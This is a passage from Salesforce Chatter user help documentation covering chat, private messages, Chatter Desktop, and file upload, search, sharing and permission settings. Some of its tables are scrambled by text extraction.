Adding People to the My Favorites List in Chat
The list of people you follow in Chatter can be long. Add up to 100 chats with one or more people to your My Favorites list
and they’ll always show up at the top of your chat list.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

• In an active chat with one or more people, click  to save the chat as a favorite.
• You can also click and drag a single person’s name from the People I Follow list to the My Favorites list.

• You can rename a chat with multiple people in your My Favorites list. Click Edit next to My Favorites, click the
multiple-person chat you want to rename, and type a new name. For example, if you have a favorite chat with Sue, John,

Jeff, you could rename it to Sales Team. All names must be unique.

See Also:
Using the Chat List

2393

Using the Chat ListCollaborate within Your Company



Removing People from the My Favorites List in Chat
Remove chats with one or multiple people from your My Favorites list if you chat with them less often. People you follow in
Chatter will still show up in your People I Follow list.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Next to the My Favorites list, click Edit.

2. Next to the name of the chat you want to remove, click the  button.
3. When you’ve finished deleting chats from the list, click Done next to the My Favorites list.

You can also remove chats from the My Favorites list by clicking the  icon in an active chat.

See Also:
Adding People to the My Favorites List in Chat

Changing Your Chat Status
Let people know if you're available to chat, or set your status to Offline if you don't want to chat.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

People can see your status:

• In their chat lists
• On your profile
• On people hovers

To change your chat status, click Available, Away, or Offline at the top of your chat list. For example, if your status is set to
Available but you don't want to chat with others, click Available and choose Offline.

Your status automatically changes to idle if you're idle for 15 minutes. To change this setting, click Chat >  > Options, then
select General Settings.

See Also:
Editing Chat Options
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Chatting with People
Chat with one or more people in Chatter.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Start a chat with any online Chatter user.

• Use the search box at the top of Chatter Messenger to find and start a chat with anyone in your organization.
Alternatively, click a name in the People I Follow or My Favorites list.

• From a person’s profile, click Start Chat.
• From any feed, hover over a person’s name and click Start Chat.

2. Optionally, add up to 10 people to the chat.

a. Drag people from your chat list to the active chat, or click  at the top of the active chat to search for and add any
online user in Chatter.

b. Repeat until you’ve added everyone you need for the chat.

Click  to see a list of everyone in the chat.

Note:  When you leave a chat with multiple people, the other people in the chat can continue chatting without you.
You need to be added back to the chat to participate again.

See Also:
Changing Your Chat Status

Chat History
View your chat history.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

When you start a chat with someone, your conversations with them from the last 72 hours are automatically shown. To see a
list of all conversations from the last 72 hours:

1. Click the Chat header to expand the chat window.

2. Click .
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3. Click someone’s name to see your chat history with them.

See Also:
Using Chatter Messenger

Adding Emoticons to a Chat
Typing certain combinations of letters and punctuation marks inserts a whimsical icon into your chat conversation.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The following emoticons are available.

Typed CharactersEmoticon

:-), :), :], =)

:-(, :(, :[, =(

:-D, :D, =D

:-O, :O, :-o, :o

:-P, :P, :-p, :p, =P

;-), ;)

You can turn off emoticons in Chat >  > Options.

See Also:
Editing Chat Options

Popping Out Chat Windows
Keep chatting—even when you minimize your browser or use other applications—by popping out a chat or your chat list into
a separate browser window.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

• Click  in the top-right corner of an active chat or the entire chat list to pop it out.
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• Click  in the top-right corner of a popped-out chat or chat list to pop it back in to your Salesforce screen.

See Also:
Editing Chat Options

Editing Chat Options
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To edit your chat options, click  in the top-right corner of the chat window, then click Options.

Tip:  When you click , you can also quickly toggle the visibility of My Favorites, People I Follow, and Offline
People in your chat list. You can also toggle the options to Play sounds and Show emoticons.

General Settings

DescriptionOption

When selected, your status changes to “idle” if you are idle in your Salesforce app for the
length of time you specify.

Change status to Idle after 15
minutes

When selected, graphics such as  or  display when people you chat with type standard
textual emoticons such as :-) or :-(.

Show emoticons

When selected, the timestamp for chat messages displays only when you hover over an
individual message. When not selected, the timestamp displays inline with each chat message
and status change.

Show a timestamp only when
I hover over a message

Sounds and Notifications

DescriptionOption

When selected, a sound plays when someone starts a new chat with you.Play a sound for new messages

Note:  Sounds play for all incoming messages when a chat is minimized, a chat is
out of focus (for example, if you have multiple chats), or when you’re using another
application or browser tab.

When selected, a notification saying “You have new chat messages” displays in your browser
tab when someone sends you a new chat message.

Alert in browser tab for new
messages

Chat List

Select the lists of people that you want to see in your chat list:

• My Favorites
• People I Follow
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• Show people who are offline

See Also:
Adding Emoticons to a Chat
Changing Your Chat Status

Can I turn off Chat?
To prevent people from chatting with you, set your status to Offline.

Administrators can enable or disable Chat for an organization.

See Also:
Changing Your Chat Status

Can I change the sounds I hear in chat?
To change your sound and notification settings, go to Chat >  > Options and select Sounds and Notifications.

See Also:
Editing Chat Options

PRIVATE MESSAGES

Chatter Messages Overview
Communicate privately in Chatter using messages.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Sending Private Chatter Messages (3:15 minutes)

Chatter messages let you have secure private conversations with other Chatter users. Use messages to send your manager a
question privately, or to communicate with a few select people when a discussion isn't relevant to everyone you work with.
Messages are also used to notify people when a file has been shared with them. Messages don't appear in your feed, your
profile, global search results, or any other part of Chatter that's publicly visible.
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View your messages by clicking the Messages link in the Chatter tab. On the My Messages page, you can:

• See the most recent message in each of your conversations. The most recent message displays at the top of the list.

• See the photo of the person who sent the most recent message in a conversation.

• See if you have unread messages ( ).

• See if you sent the most recent reply ( ) in a conversation.

• Click any message to view the full history of messages exchanged in that conversation.

• Send a message by clicking New Message.

Your messages are organized into conversations, with each conversation defined by the unique combination of people
participating in it. For example, let's say you send a message to Sally Smith. When Sally replies, her message continues your
one-on-one conversation. Every new message you send to Sally—even if it's about a different topic—also continues the same
conversation. Over time, you build a rich conversation history with Sally that contains every message you've ever exchanged
with her. At the same time, let's say you send a message to both Sally Smith and Bob Johnson. That message is considered
part of a separate conversation between you, Sally, and Bob. When Sally replies, her message continues a separate conversation
from your one-on-one conversation with Sally.

Consider these tips for using Chatter messages.

• You can send messages to anyone in your Chatter organization. It doesn't matter who you follow, who's following you,
what groups you belong to, or if the recipient is a customer.

• Conversations can involve just one other person, or up to ten people total, including yourself. You can't send a message to
yourself.

• Conversation participants are established when someone sends the first message in the conversation. No one can add people
or remove people from the conversation after the first message is sent.

• As others reply, the Messages link on the Chatter tab shows the number of conversations with new messages. If you're
already receiving Chatter email notifications, you'll automatically be notified of new messages.

• You can't delete messages or conversations.

• An administrator with the “Manage Chatter Messages” permission can view and delete all users' messages in Chatter; for
example, for compliance purposes.

• If after reading the messages in a conversation you want to mark the conversation unread, you can do so only via the Chatter
REST API, not via the user interface.

See Also:
What is chat?

Searching for Chatter Messages
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To search for people and text in your Chatter messages:

1. In My Messages, enter your search terms in the search box above your messages. Keep in mind these simple search tips:

• If you're viewing your list of conversations, search looks for matches across all conversations. If you're viewing a single
conversation, search looks for matches only within that conversation.
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• Searching for a person's name (such as bob johnson) finds both the conversations where Bob Johnson is named in
the text as well as conversations where he's a participant. If you search for your own name, search results will include
all of your messages and conversations because you're a participant in every conversation.

• Searching for bob jo finds both Bob Jones and Bob Johnson. We automatically search for terms starting with bob
jo, as if you had entered the * (asterisk) wildcard (bob jo*).

• If you search for the term customer, you'll see matches on that term within the text of messages. Matches don't
include people who are identified as customers in a conversation's participant list.

2. Click Search.
3. Once you see the search results, you can:

• Refine your search by entering additional search terms or using wildcards or operators.
• Click a message to view the full conversation if you initially searched across all conversations.

If there are matches on names in the participant list and the conversation involves lots of people, the match might not be
visible because the participant list doesn't show everyone's name. In other words, you'll see the conversation included as a
match but the highlighted name match might be hidden from view.

Clear your search terms by clicking . Chatter automatically clears your search when you enter a reply, send a new message,
or leave My Messages.

See Also:
Sharing Files with People

Sending Chatter Messages
Send messages to communicate privately in Chatter.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To send a Chatter message:

1. Start the message from one of these locations:

• Click the Messages link on the Chatter tab, then click New Message in My Messages.
• Click a person's name anywhere in Chatter to view their profile and click Send a message.
• Click Send a message on a person's hover.
• When viewing the full message history of a conversation, use the text box under the most recent message to send a

reply.
• When viewing the email notification about a message you've received, if email replies to Chatter are enabled, reply to

the email.

Sharing a file with people is another way to send a Chatter message. When you share a file, recipients automatically receive
a message that lets them know the file has been shared, as well as any additional information you provided.

2. If you started in the Send a Message dialog box, you can add people's names to the recipient list. Type a name in the To
field and click the name to select it. Add more people to the conversation by entering additional names.
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If you're replying within a conversation or via email, the conversation participants can't be changed.

3. Write your message. Messages can be up to 10,000 characters.
4. Submit your message using the appropriate method:

• In the Send a Message dialog box, click Send.
• If you're replying within a conversation, click Reply (or Reply All if the conversation involves multiple recipients).
• If you're replying via email, use the Send option in your email application.

If your message continues an existing conversation, your reply is added to the conversation and appears at the top of the list
in My Messages. If your message starts a new conversation because you haven't previously exchanged messages with that
unique combination of recipients, your message appears at the top of the list in My Messages as a brand new conversation.

See Also:
Replying to Chatter Email Notifications

Using Chatter Desktop
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

In the Chatter Desktop window:

To:Click:

Change your chat status. Select Available, Away, or Offline. People can’t chat with you when you’re Offline.Your
profile
photo

See feed updates from everyone and everything you follow, and post an update.
• For any feed post, click Comment to add a comment, Like to receive email notifications if others comment

on that post, or Delete to delete the post, if you have access.
•

To post a file from your computer, drag the file to , or click , which appears when you type a post.
• To post a link, type the link in the text box at the top of your feed, or click , which appears when you type

a post.
• Use the Sort By filter at the top of a feed to sort updates:

◊ Post Date—Sorts feeds by post date. To see comments, you must click Show All Comments below a
post.

◊ Post and Comment Date—Sorts feeds by post and comment date. Each comment appears again when
you click Show All Comments under its associated post.

See and comment on updates directed to you.
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Chat with people and see their updates. Chat messages are displayed in a separate window.
• Click Chat Favorites  to see people or chats you’ve added as favorites. To add a favorite, click  next to

someone’s name or in any active chat with one or more people.
• Click Following or Followers then click a person’s name to see their updates or post to their feed.

• Hover over someone’s name:

◊ Click  to send them a private message.
◊ Click  to add them as a favorite chat. Their name appears in your Chat Favorites  list.
◊ Click  to follow someone or  to stop following them.
◊ Click  to start a chat. You can then add up to 10 people to the same chat by clicking  in the chat

window and searching for people to add. You can’t chat with people who are Offline.

Note:  Chat is only available if it’s enabled in your organization.

Read and reply to private Chatter messages. Click a message to view it, or click New Message to send a new
message.

Note:  Messages are only available if they are enabled in your organization.

See feed updates from groups:
• Click a group name or search for a group to view its feed or to post updates. You can post in all public groups

and any private groups that you belong to.
• Click Join to join a group, or Member to leave the group.

• Click  to view the group description.

See and comment on records you follow. From the drop-down menu at the top, select the type of record you
want to view, for example, Account. If you’re not following records, there won’t be any records in the list. Click
a record’s name to view its details. Chatter Desktop shows the first eight fields on a record.

Edit your Chatter Desktop settings or switch your connection.

Instantly synchronize your data. While Chatter Desktop synchronizes your data automatically, it does not always
happen instantly.

See Also:
Troubleshooting Chatter Desktop
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CREATE, SHARE, AND ORGANIZE FILES

Differences between Files, Salesforce CRM Content,
Salesforce Knowledge, Documents, and Attachments

AttachmentsDocuments TabSalesforce
Knowledge

Salesforce CRM
Content

Files Tab

Attach files to
records from the

Store Web
resources, such as,

Create and manage
content, known as

Publish and share
official corporate

Upload, store, find,
follow, share, and

Purpose

Attachments relatedlogos, DOT files,articles, in afiles with coworkerscollaborate on
list on selected
detail pages.

and other
Visualforce
materials in folders

knowledge base.
Internal users and
customers (on your

and deliver them to
customers.

Salesforce files in
the cloud.

without attaching
them to records.

Customer Portal,
partner portal,
Service Cloud
Portal, or
Force.com Sites)
can quickly find and
view articles they
need.

Add a file to a
specific record, like

Add a custom logo
to meeting requests

Write, edit, publish,
and archive articles

Create, clone, or
modify a sales

Upload a file in
Chatter and store it

Common Uses

an event, marketingby uploading yourusing the Articlespresentation andthere privately until
campaign, contact,logo to the

Documents tab.
Management tab or
find and view
published articles

save it so only you
can see it and work
on it. When you're

you're ready to share
it. Share the file
with coworkers and

or case by attaching
it on the

using the Articlesready, publish it sogroups to Attachments related
list.tab. Customers and

partners can access
other users in your
company have

collaborate and get
feedback. Attach

articles if Salesforceaccess to it. Createfiles to posts in a
Knowledge isa content pack andChatter feed on the
enabled in yoursend it to

customers.
Home tab, Chatter
tab, a profile, a
record, or a group.

Customer Portal,
partner portal,
Service Cloud
Portal, or
Force.com Sites.
Create a public
knowledge base so
website visitors can
view articles.

AllAllAllAllAllSupported File
Types

2403

Differences between Files, Salesforce CRM Content, Salesforce
Knowledge, Documents, and Attachments

Create, Share, and Organize Files



AttachmentsDocuments TabSalesforce
Knowledge

Salesforce CRM
Content

Files Tab

5 MB for
attachments

2 GBMaximum File
Sizes

• 5 MB for file
attachments

• 5 MB• 2 GB
• •10 MB for

Google Docs
20 KB for a
custom-app logo • 2 GB for feed

attachments• 38 MB when
uploaded via the
API

• 10 MB for files
attached to
email• 10 MB when

uploaded via
Visualforce

See Also:
Files Overview
Salesforce CRM Content Overview
Documents Home

CHATTER FILES

Files Overview
Use the Files page to upload, store, find, follow, share, and collaborate on files in the cloud.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Sharing Files in Chatter (2:45 minutes)

Any file you own and have access to is available to share or attach to posts or comments on Chatter feeds. All file types are
supported, including everything from Microsoft® PowerPoint presentations and Excel spreadsheets, to Adobe® PDFs, image
files, audio files, and video files. Files up to 2 GB can be uploaded by default. However, your maximum file size is determined
by your organization.

Files are automatically added to the Files list when:

• You upload a file.

• You or someone else attaches a file to a Chatter feed or comment. This includes files attached to all public groups, whether
you're a member or not, and private groups you're a member of, but not private groups you're not a member of.

• Someone else shares a file privately with you using the Sharing dialog box.

• You upload a file to a Salesforce CRM Content library.
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• Someone else uploads a file to a library you're a member of.

• You or someone else creates a content pack or uploads a Web link in Salesforce CRM Content. You only see files from
content packs and Web links you have access to.

To learn who can perform which actions on a file, see File Sharing Settings and Permissions on page 2412. For more information
about Chatter files and Salesforce CRM Content files, see Differences between Files, Salesforce CRM Content, Salesforce
Knowledge, Documents, and Attachments on page 2403.

See Also:
Attaching a File to a Post or Comment
Following Files

FILES TAB

Using the Files Tab
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

On the Files page, you can:

• See all the files you own or have access to and filter a certain group of files.

• Search for files using specific filters and by typing terms in the Files search box, or the search box at the top of the page.

• Upload private files or upload and share files with people, groups, or via a file link.

• Preview a file without downloading it.

• Follow and receive updates about a file in the Chatter feed. Click  next to the file you're following to stop receiving
updates about the file.

• Click  to download, upload a new version, share with people, groups, or via link, and see sharing settings.
• Click a file name to view the file detail page. You can view detail pages for all files, but you'll only see updates in the Chatter

feed for files you follow.
• Click a file owner's name to see his or her profile.

See Also:
Filtering Your Files List
File Sharing Settings and Permissions
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Filtering Your Files List
Click a filter on the sidebar to see a certain subset of files.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Files tab lists all the files you own or have access to. Filters show you certain groups of those files, letting you find what
you’re looking for quickly.

DescriptionFilter Name

All files you own and have access to.All Files

The most recent files you've viewed.Recently Viewed

All of the files you own, files shared with you, and files you
follow.

MY FILES

Only the files you own.Files I Own

Only files that have been shared with you either by a private
share or a public post to your profile.

Files Shared with Me

Only the files you're following in Chatter.Files I Follow

Files anyone has attached to groups you're a member of.FILES IN MY GROUPS

Files anyone has uploaded to libraries you're a member of, as
well as all files you uploaded to your personal library.

FILES IN MY LIBRARIES

See Also:
Viewing Where a File is Shared

Searching for Files
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Clicking Files displays Chatter and Salesforce CRM Content files you own and have access to, including files posted to feeds.
The 25 most recently viewed files are listed by default. You can see and search a certain group of files by clicking a specific
filter on the sidebar. The search results are filtered based on the terms entered.

• All Files—All files you own and have access to from Chatter and Salesforce CRM Content, including:

◊ Files that have been shared with you

◊ Files you're following
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◊ Files in your Chatter groups

◊ Files in your Salesforce CRM Content libraries

◊ Files attached by other people to a Chatter feed. This includes files attached to all public groups, whether you're a
member or not, and private groups you're a member of, but not private groups you're not a member of.

• Recently Viewed—The most recent files you've viewed.

• MY FILES—All files you own, files shared with you, and files you follow.

◊ Files I Own—Files you have:

- Uploaded on the Home or Files page. These are private and not shared with anyone, but you can view them, perform
actions, share them, and attach them to Chatter feeds.

- Attached to Chatter feeds from your computer.

- Uploaded to Salesforce CRM Content libraries you're a member of and your personal library.

◊ Files Shared with Me—All files that have been shared with you either by a private share or a public post to your profile.

◊ Files I Follow—All files that you're following.

• FILES IN MY GROUPS—All files you and other people shared to groups you're a member of. The last five groups
you’ve visited are listed.

• FILES IN MY LIBRARIES—All files you and other people uploaded to libraries you're a member of and all files you
uploaded to your personal library. The first five libraries you're a member of, including your personal library, are listed. If
you're a member of more than five libraries, click More to see a complete list.

To search for files using the Files search:

1. Optionally, click a filter on the sidebar to restrict your search to a specific set of files.
2. Enter your search terms in the box on the Files page. You can search by file name, description, owner, type, or within the

file's text.

3. Click Search to see a filtered list of all relevant files based on your search terms. Or click  to clear your search terms.

You can also search for files from the header search box. Use feed search to find files posted in a specific Chatter feed, such
as on a profile, on a record, or in a group.

Note:  Feed search returns matches for file or link names shared in posts, but not in comments.

The Files list doesn't include:

• Documents from the Documents tab.

• Attachments from the Notes and Attachments related list.

Search supports several file types and has limits on file sizes. If a file exceeds the maximum size, the text within the file isn't
searched, but the file's name, description, type, and owner are.

Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.htm, .html, .xhtmlHTML

25 MB.pdfPDF

25 MB.ppt, .pptx, .pptmPPT
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Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.rtfRTF

5 MB.c, .cpp, .css, .csv, .ini, .java,
.log, .sql, .txt

Text

25 MB.doc, .docx, .docmWord

5 MB.xmlXML

5 MB.xls, .xlsx, .xlsmXLS

See Also:
Following Files
Filtering Your Files List

UPLOAD AND SHARE FILES

Overview of Uploading and Sharing Files
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Upload and share files from:

• The Home page

• The Files page

• The Files Shared with list on a group

• The Files Owned by list on a profile

All file types are supported, including everything from Microsoft® PowerPoint presentations and Excel spreadsheets, to Adobe®

PDFs, image files, audio files, and video files. Files up to 2 GB can be uploaded by default. However, your maximum file size
is determined by your organization.

The Files Page

When you upload files, they’re added to MY FILES and Files I Own on the Files page. Files you upload from the Files page
are automatically uploaded as private. You own files you upload.

Files are also automatically added to the Files page by:

• Attaching a file to a Chatter feed.
• Uploading files to Salesforce CRM Content personal and shared libraries.
• Creating content packs or uploading Web links in Salesforce CRM Content.
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The Files list doesn't include:

• Documents from the Documents tab.
• Attachments from the Notes and Attachments related list.

Note: Files without a file extension or with an unrecognized file extension are listed as “unknown” in the Type
column.

Private Files

A private file is private, not shared with anyone, and you are the file owner. Only file owners and users with the “View All
Data” permission can see private files. Private files are indicated by the word “Private” and a lock  icon in both the MY FILES
and Files I Own lists and on the file's detail page. You can search for your private files in Chatter and on the Files list.

Sharing Private Files

You can share private files from the file detail page or by attaching them to a Chatter feed, a profile, a record, or a group. You
can also share a file via a link. When you share a private file, it's no longer private. To learn who can perform which actions
on a file, see File Sharing Settings and Permissions on page 2412.

See Also:
File Size Limits in Salesforce

Uploading Files
You can upload one or more files from the Files page, the Files filter on the Chatter tab, the Files Shared With list on a group,
or the Files Owned by list on a profile.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Depending on your browser and settings, you may only be able to upload one file at a time. For information on browsers that
support uploading multiple files, see Browsers that Support Uploading Multiple Files on page 2411.

1. On the Files page, the Files filter on the Chatter tab, the Files Shared With list on a group, or the Files Owned by list on
a profile, click Upload Files.

2. In your browser’s file selection dialog box, select the files you want to upload.

Press CTRL to select multiple files.

Tip: You can also drag the selected files onto the Files list. This is not supported in Internet Explorer.

3. In the Upload to My Files dialog box, view the status of your file uploads.

If you decide not to upload the files you’ve selected, do one of the following:

a. To cancel uploading a particular file, to the right of the upload status indicator, click .
b. To cancel all remaining files, at the bottom of the dialog box, click Cancel Remaining Uploads.
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You’ll need to manually delete files that were uploaded before you clicked Cancel Remaining Uploads from the file
detail page.

4. When your files have been uploaded, click Close.

When you upload files from the Files page, the files are private. You must manually share the files with people or groups.

See Also:
Uploading a New Version of a File

File Size Limits in Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

The following are maximum file size limits for files in Salesforce.

Attachments
Related List

Documents TabSalesforce
Knowledge

Salesforce CRM
Content

Files Tab and
Chatter

Feature

5 MB for
attachments

2 GBMaximum File
Size

• 5 MB for file
attachments

• 5 MB• 2 GB

• •10 MB for
Google Docs

20 KB for a
custom-app logo • 2 GB for feed

attachments• 38 MB when
uploaded via the
API

• 10 MB for files
attached to
email• 10 MB when

uploaded via
Visualforce

See Also:
Overview of Uploading and Sharing Files

Uploading a New Version of a File
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Upload a new version of a file that was previously uploaded to My Files or attached to a Chatter feed. After you upload the
new version, it is available on the Files list and in Chatter. For example, upload a new version of a file if the contents of the
previous version have changed. When you upload a new version of a file, a notification is posted to your Chatter feed. Anyone
following the previous version also gets a notification in their Chatter feed. If the file is private, only the file owner sees the
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notification. The notification of the new version includes a file preview, the ability to download, and the file description if
provided. Uploading a new version replaces all previous versions in Chatter, but previous versions are still available by clicking
Show all versions on the file detail page.

To upload a new version:

1. Upload a new version from any of these locations:

• On the file detail page—Click  Upload New Version.
• Next to the file in a feed—Click More Actions > Upload New Version.
• Next to the file on the Files page, the Files Shared with list on a group, or the Files Owned by list on a profile—Click

 >  Upload New Version.

• On a file hover—Click  Upload New Version.

2. Click Browse, and select a file from your computer.
3. Optionally, add information about the changes you made to the file in the What Changed dialog box. The information

is shown on the Version History list.
4. Click Upload New Version.

The file detail page and any previous posts show the updated version.

Note:

• Only file owners, collaborators, and users with the “Modify all Data” permission can upload new versions. To
learn who can perform which actions on a file, see File Sharing Settings and Permissions on page 2412.

• The file owner doesn't change when a collaborator uploads a new version.

• If the file is from Salesforce CRM Content, you can't upload a new version from the file detail page. You can
click Go to Content Detail Page and upload a new version there.

See Also:
Viewing File Version History
Following Files

Browsers that Support Uploading Multiple Files
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

These browsers allow you to upload multiple files from the Files tab, the Files Shared With list on a group, or the Files Owned
by list on a profile. If your browser does not support uploading multiple files, you can still upload files one at a time.

Additional RequirementsBrowser

Must be the latest stable versionGoogle® Chrome™

Must be the latest stable versionMozilla® Firefox®

Must have Flash 11 or later installedInternet® Explorer® 7, 8, 9
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Additional RequirementsBrowser

Version 5.1.xApple® Safari® for Mac

See Also:
Uploading Files

File Sharing Settings and Permissions
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

This table describes file sharing settings which are determined by how the file is shared. The sharing setting and icon appear
on a file's detail page and on the Shared With list on a file detail page.

When Does a File Have This Setting?DefinitionSharing Setting

A file is private when you:The file is private. It hasn't been shared
with anyone else besides the owner. Only

 Private
• Upload it on the Home or Files page

the file owner and users with “Modify All • Publish it to your personal library
Data” permission can find and view this
file, unless it is in a personal library, then
only the file owner has access to it.

• Stop sharing it with everyone (Make
Private)

• Delete posts that include the file and
the file isn't shared anywhere else

A file is privately shared when it's:The file has only been shared with specific
people, groups, or via link. It's not available

 Privately Shared
• Only shared with specific people or a

private groupto all Chatter users in your company. Only
the file owner, users with “Modify All • Posted to a private group
Data” or “View all Data” permission, and • Shared via link
specific file viewers can find and view this
file.

• Posted to a feed on a record

• Published to a shared library

A file is shared with your company when
it's posted to a feed on the Home page,

All Chatter users in your company can find
and view this file.

 Your Company

Chatter page, a profile, a record, or a public
group.

This table describes the actions that can be performed by users based on their permission:

File ViewerFile CollaboratorFile OwnerAction

YesYesYesView/Preview
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File ViewerFile CollaboratorFile OwnerAction

YesYesYesDownload

YesYesYesShare

YesYesYesAttach a file to a post

YesYesUpload New Version

YesYesEdit Details

YesYesChange Permission

YesMake a File Private

YesRestrict Access

YesDelete

Note:

• No access means that no one in your company can find or view the file unless the file is specifically shared with
them or a private group they’re a member of.

• Users with “Modify All Data” permission can view, preview, download, share, attach, make private, restrict access,
edit, upload new versions, and delete files they don't own. However, if the file is in a personal library, then only
the file owner has access to it.

• Users with “View All Data” permission can view and preview files they don't own. However, if the file is in a
personal library, then only the file owner has access to it.

• Groups (including group members) and records have viewer permission for files posted to their feeds.

• Permissions for files shared with libraries are determined by the library.

See Also:
Making a File Private
Viewing Where a File is Shared

Changing File Permissions
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

File owners and collaborators can change file permissions for people and groups from viewer to collaborator and vice versa.
They can also change file permissions for files shared with their company to viewer, collaborator, or no access.

• Viewers can view, download, and share files.

• Collaborators can view, download, share, change permission, edit the file, and upload new versions.

• No access means that no one in your company can find or view the file unless the file is specifically shared with them or a
private group they’re a member of.
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To change a file permission:

1. On a file detail page, click Share File > Sharing Settings.
2. Find the person or group whose permission you want to change. Or change permission for Any Chatter user in

your company.
3. Click the Permission drop-down and select Viewer, Collaborator, or No Access (for your company). The change happens

immediately.
4. Click Close.

Note:

• A file is shared with your company when it's posted to a feed on the Home page, Chatter page, a profile, a record,
or a public group. Any Chatter user in your company is given viewer permission by default. If you change
the permission from viewer or collaborator to no access, you remove the share to company and to public groups.

• When you share a file with someone, they are given collaborator permission by default. When you share a file
with a group, the group members are given viewer permission by default. You can change the default permissions
when you share a file for the first time. File owners and collaborators can change permissions after a file has been
shared.

• File link recipients can only view and download files. They can't be collaborators.

See Also:
File Sharing Settings and Permissions
Making a File Private

Making a File Private
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

File owners and users with the “Modify All Data” permission can make a file and file link, if applicable, private ( ) if they
decide they don't want it to be shared anymore. Making a file private removes it from any posts it's attached to and removes
it from everywhere it's been shared. Only the owner and users with the “Modify All Data” permission will have access to it.
Alternately, file owners and users with the “Modify All Data” permission can restrict access to a file that originated in a
Salesforce CRM Content library to remove the file from everywhere it's been shared, except the library.

1. From the file detail page of the file you want to make private or restrict access, click either Share File > Sharing Settings
or Show All on the Shared With list.

2. On the Sharing Settings dialog box, click Make private (or Restrict access if the file originated in a Salesforce CRM
Content library).

3. On the confirmation dialog box, click Make private (or Restrict access).

See Also:
Post Visibility
Viewing Where a File is Shared
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Sharing Files with Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Share a file with a private group so only members of that group can see it or share a file with a public group so members of
that group and all Chatter users in your company can see it. Anyone who can see a file can share it.

To share a file with one or more Chatter groups:

1. Share the file from one of these locations:

• On the detail page of the file you want to share—Click File Sharing Settings > With group. Or click Show All
on the Shared With list then click Groups on the Sharing Settings dialog box.

• Next to the file in a feed—Click More Actions > File Sharing Settings then click Groups on the Sharing Settings
dialog box..

• Next to the file on the Files page, the Files Owned by list, or the Group Files list—Click Share with groups.

• On a file hover—Click Share File then click Groups on the Sharing Settings dialog box.

2. Type the name of the group you want to share the file with and click the name to select it. Group members are given viewer
permission by default which lets them view, download, and share files.

3. Optionally, select Collaborator to give group members permission to view, download, share, change permission, edit the
file, and upload new versions.

4. Optionally, share with more than one group by entering another name.
5. Optionally, add a message that will be posted with the file. If you don't add a message, a generic message is used.
6. Click Share and Close. The file is posted to each group you shared it with.

A private file shared with a private group becomes a privately shared file and displays the privately shared icon ( ). The file
is posted to the group's feed and only the file owner and group members can find and view the file. Any file shared with a

public group is viewable by all users in your company, displays the your company icon ( ), and is posted to the group's feed.

On the Sharing Settings dialog box, click  next to a person's or group's name to stop sharing the file with them.

Note:

• Files in your Salesforce CRM Content personal library must first be published before they can be shared.

• Web links and Google Docs from Salesforce CRM Content are listed on the Files tab, but can't be shared in
Chatter.

• Documents from the Documents tab and attachments from the Notes and Attachments related list aren't listed
on the Files tab and can't be shared in Chatter.

• Salesforce CRM Content files in Chatter may be shared with more people than shown on the Sharing dialog box
if they are part of a content pack or delivery.
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• The maximum number of times a file can be shared is 100. This includes files shared with people, groups, and
via links. If a file is privately shared and nears the 100 share maximum, consider making the file public by posting
it to your feed.

See Also:
Using the Group Files List
Viewing Where a File is Shared

Sharing Files with People
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Share a file privately so only specific Chatter users in your company can see it. Anyone who can see a file can share it.

To share a file with one or more Chatter users in your company:

1. Start by sharing the file from one of these locations:

• On the detail page of the file you want to share—Click either File Sharing Settings > With people. Or click Show
All on the Shared With list then click People on the Sharing Settings dialog box.

• Next to the file in a feed—Click More Actions > File Sharing Settings then click People on the Sharing Settings
dialog box.

• Next to the file on the Files page, the Files Owned by list, or the Group Files list—Click Share with people.

• On a file hover—Click Share File then click People on the Sharing Settings dialog box.

2. Type the name of the person you want to share the file with and click the name to select it. They are given collaborator
permission by default which lets them view, download, share, change permission, edit the file, and upload new versions.

3. Optionally, select Viewer to give the person permission to view, download, and share files.
4. Optionally, share with more than one person by entering another name.
5. Optionally, add information to the message that recipients receive.
6. Click Share and Close. Recipients automatically receive a Chatter message on their My Messages page on the Chatter

tab. The message lets the recipient know you shared a file with them and any additional information you provided. If
they're already receiving Chatter email notifications, they'll also automatically be notified of new messages.

Unless the file was already shared with your company, it's privately shared and displays the privately shared icon ( ). It's not
posted anywhere and only the people you specifically shared it with can find and view it. If it was already shared with your

company, it retains the your company icon ( ) and all Chatter users in your company can find and view it.

On the Sharing Settings dialog box, click  next to a person's or group's name to stop sharing the file with them.

Note:

• Files in your Salesforce CRM Content personal library must first be published before they can be shared.

• Web links and Google Docs from Salesforce CRM Content are listed on the Files tab, but can't be shared in
Chatter.
